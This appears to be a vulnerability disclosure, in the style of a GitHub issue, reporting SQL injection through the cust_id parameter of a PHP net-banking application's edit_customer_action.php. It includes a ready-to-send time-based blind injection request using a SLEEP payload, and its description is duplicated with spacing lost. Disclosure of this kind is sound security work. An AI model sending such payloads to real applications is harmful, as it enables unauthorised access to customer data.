net-banking/edit_customer_action.php from line 16,The $_GET['cust_id'] parameter is controllable, the parameter cust_id can be passed through get, and the $_GET['cust_id'] is not protected from sql injection, line 59 if (($conn->query($sql0) === TRUE)) { ?> made a sql query,resulting in sql injection
GET /net-banking/edit_customer_action.php?cust_id=666 AND (SELECT 5721 FROM (SELECT(SLEEP(5)))pcwq) HTTP/1.1Host: www.bank.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1
Attack results pictures
The text was updated successfully, but these errors were encountered:
Vulnerability file address
net-banking/edit_customer_action.phpfrom line 16,The$_GET['cust_id']parameter is controllable, the parameter cust_id can be passed through get, and the$_GET['cust_id']is not protected from sql injection, line 59if (($conn->query($sql0) === TRUE)) { ?>made a sql query,resulting in sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: